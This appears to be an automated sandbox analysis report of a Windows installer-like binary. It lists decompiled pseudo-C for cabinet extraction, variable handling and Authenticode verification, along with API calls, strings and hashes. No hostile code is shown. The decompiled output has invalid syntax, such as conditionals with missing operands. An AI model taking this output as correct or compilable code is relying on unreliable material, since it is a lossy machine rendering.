                                                                                                                                                                  								_push("Failed to create extraction thread.");
                                                                                                                                                                  								goto L10;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t37 =  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							E004300D9(0x80004005, "cabextract.cpp", 0x9a, _t30);
                                                                                                                                                                  							_push("Failed to create operation complete event.");
                                                                                                                                                                  							goto L10;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t40 =  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "cabextract.cpp", 0x97, _t30);
                                                                                                                                                                  						_push("Failed to create begin operation event.");
                                                                                                                                                                  						goto L10;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to copy file name.");
                                                                                                                                                                  					L10:
                                                                                                                                                                  					_push(_t30);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t30;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,0000001D,0040227F,00000000,00000000,00000000,00000001,?,0041909B,00000001,00000000,?,0041912F), ref: 0042410E
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041909B,00000001,00000000,?,0041912F,004021A7,00401E27,00401F17,00402283,00402283,00000000,00401F17,00000000), ref: 00424117
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorEventLast
                                                                                                                                                                  • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp
                                                                                                                                                                  • API String ID: 545576003-1680384675
                                                                                                                                                                  • Opcode ID: f2db9b9377cdc7e081da2dea12b42795a8b0bb4e649b11cdc6b0c9d84b657450
                                                                                                                                                                  • Instruction ID: 95f889da3006b66b6fca6e38d7065ccaa2f0ad548aedf711d1d18b57789b4f06
                                                                                                                                                                  • Opcode Fuzzy Hash: f2db9b9377cdc7e081da2dea12b42795a8b0bb4e649b11cdc6b0c9d84b657450
                                                                                                                                                                  • Instruction Fuzzy Hash: AA21F132B407367AF2206A756C49B2779DCEF147A5F110227FD05F6280EA98CC1185FC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E004232A4(void* __ecx, CHAR* _a4) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				long _t18;
                                                                                                                                                                  				void* _t19;
                                                                                                                                                                  				signed short _t22;
                                                                                                                                                                  				void* _t27;
                                                                                                                                                                  				signed short _t33;
                                                                                                                                                                  				signed int _t36;
                                                                                                                                                                  				int _t37;
                                                                                                                                                                  				signed int _t40;
                                                                                                                                                                  				void** _t44;
                                                                                                                                                                  				void* _t47;
                                                                                                                                                                  				signed short _t51;
                                                                                                                                                                  
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_t40 =  *0x456fa0; // 0x0
                                                                                                                                                                  				_push(_t36);
                                                                                                                                                                  				_t44 =  *( *((intOrPtr*)( *[fs:0x2c] + _t40 * 4)) + 4);
                                                                                                                                                                  				_t37 = _t36 | 0xffffffff;
                                                                                                                                                                  				_t47 = 0;
                                                                                                                                                                  				_v8 = _t37;
                                                                                                                                                                  				_t18 = CompareStringA(0, 0, "<the>.cab", _t37, _a4, _t37);
                                                                                                                                                                  				if(_t18 != 2) {
                                                                                                                                                                  					_t19 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x8000080, 0);
                                                                                                                                                                  					_v8 = _t19;
                                                                                                                                                                  					__eflags = _t19 - _t37;
                                                                                                                                                                  					if(_t19 == _t37) {
                                                                                                                                                                  						_t22 = GetLastError();
                                                                                                                                                                  						__eflags = _t22;
                                                                                                                                                                  						_t51 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						__eflags = _t51;
                                                                                                                                                                  						_t47 =  >=  ? 0x80004005 : _t51;
                                                                                                                                                                  						E004300D9(0x80004005, "cabextract.cpp", 0x2e0, _t47);
                                                                                                                                                                  						E00430A57(_t47, "Failed to open cabinet file: %hs", _a4);
                                                                                                                                                                  					}
                                                                                                                                                                  					L8:
                                                                                                                                                                  					_t44[0xc] = _t47;
                                                                                                                                                                  					_t21 =  <  ? _t37 : _v8;
                                                                                                                                                                  					return  <  ? _t37 : _v8;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t27 = GetCurrentProcess();
                                                                                                                                                                  				if(DuplicateHandle(GetCurrentProcess(),  *_t44, _t27,  &_v8, 0, 0, _t18) != 0) {
                                                                                                                                                                  					_t47 = E00423143(_t40, __eflags,  &(_t44[7]), _v8, _t44[2], _t44[3]);
                                                                                                                                                                  					__eflags = _t47;
                                                                                                                                                                  					if(_t47 >= 0) {
                                                                                                                                                                  						goto L8;
                                                                                                                                                                  					}
                                                                                                                                                                  					_push("Failed to add virtual file pointer for cab container.");
                                                                                                                                                                  					L5:
                                                                                                                                                                  					_push(_t47);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					goto L8;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t33 = GetLastError();
                                                                                                                                                                  				_t55 =  <=  ? _t33 : _t33 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  				_t47 =  >=  ? 0x80004005 :  <=  ? _t33 : _t33 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  				E004300D9(0x80004005, "cabextract.cpp", 0x2d5, _t47);
                                                                                                                                                                  				_push("Failed to duplicate handle to cab container.");
                                                                                                                                                                  				goto L5;
                                                                                                                                                                  			}















                                                                                                                                                                  0x00423357
                                                                                                                                                                  0x004232fe
                                                                                                                                                                  0x0042330f
                                                                                                                                                                  0x00423319
                                                                                                                                                                  0x00423327
                                                                                                                                                                  0x0042332c
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringA.KERNEL32(00000000,00000000,<the>.cab,?,?), ref: 004232D4
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 004232EC
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 004232F1
                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,?), ref: 004232F4
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 004232FE
                                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0042336D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0042337A
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to duplicate handle to cab container., xrefs: 0042332C
                                                                                                                                                                  • cabextract.cpp, xrefs: 00423322, 0042339E
                                                                                                                                                                  • Failed to add virtual file pointer for cab container., xrefs: 0042334B
                                                                                                                                                                  • Failed to open cabinet file: %hs, xrefs: 004233AB
                                                                                                                                                                  • <the>.cab, xrefs: 004232CA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                                  • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                                                                  • API String ID: 3030546534-3446344238
                                                                                                                                                                  • Opcode ID: 5e3529061ee69e73117273eda674a156fab4787b5033404564bd8d00942dad13
                                                                                                                                                                  • Instruction ID: f02bfdc93b0fa605585d6aead4254c02a75e2ab6674224579056cb22445fd439
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e3529061ee69e73117273eda674a156fab4787b5033404564bd8d00942dad13
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E31F932A00234BFEB119F65AC09F5B7AA8FF097A1F110226FD04F7150C7799E0086E8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                  			E00403680(void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, signed int* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				unsigned int _v12;
                                                                                                                                                                  				signed int _t35;
                                                                                                                                                                  				void* _t45;
                                                                                                                                                                  				void* _t47;
                                                                                                                                                                  				struct _CRITICAL_SECTION* _t59;
                                                                                                                                                                  				void* _t60;
                                                                                                                                                                  				signed int _t62;
                                                                                                                                                                  				signed int _t67;
                                                                                                                                                                  				intOrPtr _t70;
                                                                                                                                                                  				unsigned int _t71;
                                                                                                                                                                  				intOrPtr _t73;
                                                                                                                                                                  				void* _t74;
                                                                                                                                                                  				signed int* _t75;
                                                                                                                                                                  				void* _t76;
                                                                                                                                                                  
                                                                                                                                                                  				_t60 = __ecx;
                                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				_t59 = _a4;
                                                                                                                                                                  				EnterCriticalSection(_t59);
                                                                                                                                                                  				_t73 = _a8;
                                                                                                                                                                  				_t74 = E004020A3(_t60, _t59, _t73,  &_v8);
                                                                                                                                                                  				if(_t74 >= 0) {
                                                                                                                                                                  					if(_t74 != 1) {
                                                                                                                                                                  						_t35 = _v8;
                                                                                                                                                                  						_t70 =  *((intOrPtr*)(_t59 + 0x20));
                                                                                                                                                                  						_t62 = _t35 * 0x30;
                                                                                                                                                                  						if( *((intOrPtr*)(_t62 + _t70 + 0x20)) == 0 || _a16 == 1 || _a16 == 2 &&  *((intOrPtr*)(_t62 + _t70 + 0x1c)) != 0) {
                                                                                                                                                                  							L11:
                                                                                                                                                                  							_t75 = _a12;
                                                                                                                                                                  							if(_a20 != 0 && _a16 == 0) {
                                                                                                                                                                  								if( *((intOrPtr*)(_t35 * 0x30 +  *((intOrPtr*)(_t59 + 0x20)) + 0x18)) == 0) {
                                                                                                                                                                  									_t45 = _t75[2] - 1;
                                                                                                                                                                  									if(_t45 == 0) {
                                                                                                                                                                  										_push(_t75[1]);
                                                                                                                                                                  										_push( *_t75);
                                                                                                                                                                  										E00430F28(2, "Setting numeric variable \'%ls\' to value %lld", _t73);
                                                                                                                                                                  										_t76 = _t76 + 0x14;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t47 = _t45 - 1;
                                                                                                                                                                  										if(_t47 == 0) {
                                                                                                                                                                  											if( *_t75 != 0) {
                                                                                                                                                                  												_push( *_t75);
                                                                                                                                                                  												_push(_t73);
                                                                                                                                                                  												_push("Setting string variable \'%ls\' to value \'%ls\'");
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_push(0);
                                                                                                                                                                  												_push(_t73);
                                                                                                                                                                  												_push("Unsetting variable \'%ls\'");
                                                                                                                                                                  											}
                                                                                                                                                                  											_push(2);
                                                                                                                                                                  											E00430F28();
                                                                                                                                                                  											_t76 = _t76 + 0x10;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											if(_t47 == 1) {
                                                                                                                                                                  												_t67 =  *_t75;
                                                                                                                                                                  												_t71 = _t75[1];
                                                                                                                                                                  												_push(_t67 & 0x0000ffff);
                                                                                                                                                                  												_push((_t71 << 0x00000020 | _t67) >> 0x10 & 0x0000ffff);
                                                                                                                                                                  												_push(_t71 & 0x0000ffff);
                                                                                                                                                                  												_v12 = _t71;
                                                                                                                                                                  												_push(_t71 >> 0x10);
                                                                                                                                                                  												E00430F28(2, "Setting version variable \'%ls\' to value \'%hu.%hu.%hu.%hu\'", _t73);
                                                                                                                                                                  												_t76 = _t76 + 0x1c;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									E00430F28(2, "Setting hidden variable \'%ls\'", _t73);
                                                                                                                                                                  									_t76 = _t76 + 0xc;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  							_t74 = E00418BE2(_t75,  *((intOrPtr*)(_t59 + 0x20)) + 8 + _v8 * 0x30);
                                                                                                                                                                  							if(_t74 >= 0) {
                                                                                                                                                                  								goto L27;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push(_t73);
                                                                                                                                                                  								_push("Failed to set value of variable: %ls");
                                                                                                                                                                  								goto L26;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t74 = 0x80070057;
                                                                                                                                                                  							E004300D9(_t35, "variable.cpp", 0x526, 0x80070057);
                                                                                                                                                                  							_push(_t73);
                                                                                                                                                                  							_push("Attempt to set built-in variable value: %ls");
                                                                                                                                                                  							goto L26;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					_t74 = E0040348A(_v8, _t59, _t73, _v8);
                                                                                                                                                                  					if(_t74 >= 0) {
                                                                                                                                                                  						_t35 = _v8;
                                                                                                                                                                  						goto L11;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push(_t73);
                                                                                                                                                                  						_push("Failed to insert variable \'%ls\'.");
                                                                                                                                                                  						goto L26;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push(_t73);
                                                                                                                                                                  					_push("Failed to find variable value \'%ls\'.");
                                                                                                                                                                  					L26:
                                                                                                                                                                  					_push(_t74);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					_t76 = _t76 + 0xc;
                                                                                                                                                                  					L27:
                                                                                                                                                                  					LeaveCriticalSection(_t59);
                                                                                                                                                                  					if(_t74 < 0 && _a20 != 0) {
                                                                                                                                                                  						_push(_t74);
                                                                                                                                                                  						E00430F28(2, "Setting variable failed: ID \'%ls\', HRESULT 0x%x", _t73);
                                                                                                                                                                  					}
                                                                                                                                                                  					return _t74;
                                                                                                                                                                  				}
                                                                                                                                                                  			}



















                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000001,004021A3,00000000,00401E67,00000000,00000001), ref: 00403691
                                                                                                                                                                    • Part of subcall function 004020A3: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,?,000000FF,00000030,00000000,00000030,00402EC5,00402EC5,?,0040203E,00000030,?,00000000), ref: 004020DF
                                                                                                                                                                    • Part of subcall function 004020A3: GetLastError.KERNEL32(?,0040203E,00000030,?,00000000,00000000,00000007,00402EC5,?,00404461,?,?,?,00000030), ref: 00402108
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000001,00000001,?), ref: 004037F9
                                                                                                                                                                  Strings
                                                                                                                                                                  • Setting string variable '%ls' to value '%ls', xrefs: 004037A8
                                                                                                                                                                  • Setting numeric variable '%ls' to value %lld, xrefs: 004037BF
                                                                                                                                                                  • variable.cpp, xrefs: 00403707
                                                                                                                                                                  • Attempt to set built-in variable value: %ls, xrefs: 00403712
                                                                                                                                                                  • Failed to set value of variable: %ls, xrefs: 004037EA
                                                                                                                                                                  • Setting hidden variable '%ls', xrefs: 00403746
                                                                                                                                                                  • Unsetting variable '%ls', xrefs: 0040379E
                                                                                                                                                                  • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00403785
                                                                                                                                                                  • Failed to find variable value '%ls'., xrefs: 004036AC
                                                                                                                                                                  • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 0040380B
                                                                                                                                                                  • Failed to insert variable '%ls'., xrefs: 004036CD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                                  • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                                                                  • API String ID: 2716280545-445000439
                                                                                                                                                                  • Opcode ID: 05738eec3109951b30c0180e30c3c799f969fd4ce4a01d5b3647799a702fd8f9
                                                                                                                                                                  • Instruction ID: 5a0d39312afa77466f928b4d3d30b79b338dd9084fe5159fdf1a40fc51a11c1c
                                                                                                                                                                  • Opcode Fuzzy Hash: 05738eec3109951b30c0180e30c3c799f969fd4ce4a01d5b3647799a702fd8f9
                                                                                                                                                                  • Instruction Fuzzy Hash: FC41D7F1A40215BBDB349E05CC4AF6B7AACDB98B06F10512FF841772C1D27C9E41CAA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E004141E9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				struct _EXCEPTION_POINTERS _v24;
                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                  				char _v44;
                                                                                                                                                                  				signed int _v52;
                                                                                                                                                                  				intOrPtr _v60;
                                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                                  				char* _v68;
                                                                                                                                                                  				intOrPtr _v72;
                                                                                                                                                                  				intOrPtr _v80;
                                                                                                                                                                  				void _v92;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t32;
                                                                                                                                                                  				signed short _t41;
                                                                                                                                                                  				signed short _t46;
                                                                                                                                                                  				signed short _t49;
                                                                                                                                                                  				intOrPtr _t57;
                                                                                                                                                                  				void _t68;
                                                                                                                                                                  				intOrPtr _t69;
                                                                                                                                                                  				signed short _t73;
                                                                                                                                                                  				signed short _t76;
                                                                                                                                                                  				signed int _t80;
                                                                                                                                                                  
                                                                                                                                                                  				_t32 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t32 ^ _t80;
                                                                                                                                                                  				_t57 = _a8;
                                                                                                                                                                  				_t69 = _a12;
                                                                                                                                                                  				_v28 = _a4;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t68 = 0x30;
                                                                                                                                                                  				_push(_t68);
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v92);
                                                                                                                                                                  				_v24 = 0xaac56b;
                                                                                                                                                                  				_v20 = 0x11d0cd44;
                                                                                                                                                                  				_v16 = 0xc000c28c;
                                                                                                                                                                  				_v12 = 0xee95c24f;
                                                                                                                                                                  				E004267C0(_t57, __ecx, _t68, _t69, __eflags);
                                                                                                                                                                  				_v68 =  &_v44;
                                                                                                                                                                  				_v44 = 0x10;
                                                                                                                                                                  				_v40 = _t57;
                                                                                                                                                                  				_v36 = _t69;
                                                                                                                                                                  				_v92 = _t68;
                                                                                                                                                                  				_v72 = 1;
                                                                                                                                                                  				_v64 = 1;
                                                                                                                                                                  				_v52 = 0x80;
                                                                                                                                                                  				_v80 = 2;
                                                                                                                                                                  				_t41 = WinVerifyTrust(0xffffffff,  &_v24,  &_v92);
                                                                                                                                                                  				if(_t41 == 0) {
                                                                                                                                                                  					L3:
                                                                                                                                                                  					_push(_v60);
                                                                                                                                                                  					L0042FF88();
                                                                                                                                                                  					__eflags = _t41;
                                                                                                                                                                  					if(_t41 != 0) {
                                                                                                                                                                  						_push(0);
                                                                                                                                                                  						_push(0);
                                                                                                                                                                  						_push(0);
                                                                                                                                                                  						_push(_t41);
                                                                                                                                                                  						L0042FF82();
                                                                                                                                                                  						__eflags = _t41;
                                                                                                                                                                  						if(_t41 != 0) {
                                                                                                                                                                  							_t70 = E004129F9(_v28,  *((intOrPtr*)(_t41 + 0x28)));
                                                                                                                                                                  							__eflags = _t70;
                                                                                                                                                                  							if(_t70 < 0) {
                                                                                                                                                                  								_push("Failed to verify expected payload against actual certificate chain.");
                                                                                                                                                                  								goto L9;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t46 = GetLastError();
                                                                                                                                                                  							__eflags = _t46;
                                                                                                                                                                  							_t73 =  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							__eflags = _t73;
                                                                                                                                                                  							_t70 =  >=  ? 0x80004005 : _t73;
                                                                                                                                                                  							E004300D9(0x80004005, "cache.cpp", 0x3cc, _t70);
                                                                                                                                                                  							_push("Failed to get signer chain from authenticode certificate.");
                                                                                                                                                                  							goto L9;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t49 = GetLastError();
                                                                                                                                                                  						__eflags = _t49;
                                                                                                                                                                  						_t76 =  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						__eflags = _t76;
                                                                                                                                                                  						_t70 =  >=  ? 0x80004005 : _t76;
                                                                                                                                                                  						E004300D9(0x80004005, "cache.cpp", 0x3c9, _t70);
                                                                                                                                                                  						_push("Failed to get provider state from authenticode certificate.");
                                                                                                                                                                  						L9:
                                                                                                                                                                  						_push(_t70);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_v52 = _v52 | 0x00001000;
                                                                                                                                                                  					_t41 = WinVerifyTrust(0xffffffff,  &_v24,  &_v92);
                                                                                                                                                                  					if(_t41 == 0) {
                                                                                                                                                                  						goto L3;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t79 =  <=  ? _t41 : _t41 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t70 =  >=  ? 0x80004005 :  <=  ? _t41 : _t41 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "cache.cpp", 0x3c5,  >=  ? 0x80004005 :  <=  ? _t41 : _t41 & 0x0000ffff | 0x80070000);
                                                                                                                                                                  						E00430A57( >=  ? 0x80004005 :  <=  ? _t41 : _t41 & 0x0000ffff | 0x80070000, "Failed authenticode verification of payload: %ls", _t57);
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return L004267AF(_t70, _v8 ^ _t80, _t68, _t70);
                                                                                                                                                                  			}

































                                                                                                                                                                  APIs
                                                                                                                                                                  • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 00414276
                                                                                                                                                                  • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?,000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 00414290
                                                                                                                                                                  • WTHelperProvDataFromStateData.WINTRUST(00401E67,000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 004142D8
                                                                                                                                                                  • GetLastError.KERNEL32(00401E67,000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 004142E1
                                                                                                                                                                  • WTHelperGetProvSignerFromChain.WINTRUST(00000000,00000000,00000000,00000000,00401E67,000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 0041431C
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00401E67,000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 00414325
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to verify expected payload against actual certificate chain., xrefs: 0041436B
                                                                                                                                                                  • Failed to get provider state from authenticode certificate., xrefs: 0041430F
                                                                                                                                                                  • Failed to get signer chain from authenticode certificate., xrefs: 00414353
                                                                                                                                                                  • cache.cpp, xrefs: 004142B7, 00414305, 00414349
                                                                                                                                                                  • Failed authenticode verification of payload: %ls, xrefs: 004142C2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DataErrorFromHelperLastProvTrustVerify$ChainSignerState
                                                                                                                                                                  • String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp
                                                                                                                                                                  • API String ID: 2293613592-2590768268
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,?,00000000,?,00413E6B,?,00000000,?,?,00421953), ref: 00412E22
                                                                                                                                                                  • GetLastError.KERNEL32(?,00413E6B,?,00000000,?,?,00421953,?,00000000,?,00000000,?,?,00421953,?), ref: 00412E30
                                                                                                                                                                  • CloseHandle.KERNEL32(?,00421953,00000001,00000003,000007D0,?,?,00421953,?), ref: 00412F0F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
                                                                                                                                                                  • API String ID: 2528220319-1187406825
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                  			E00436B86(signed short _a4, signed short* _a8, long _a12, long _a16, long _a20, signed short _a24, signed short _a28) {
                                                                                                                                                                  				void* _v8;
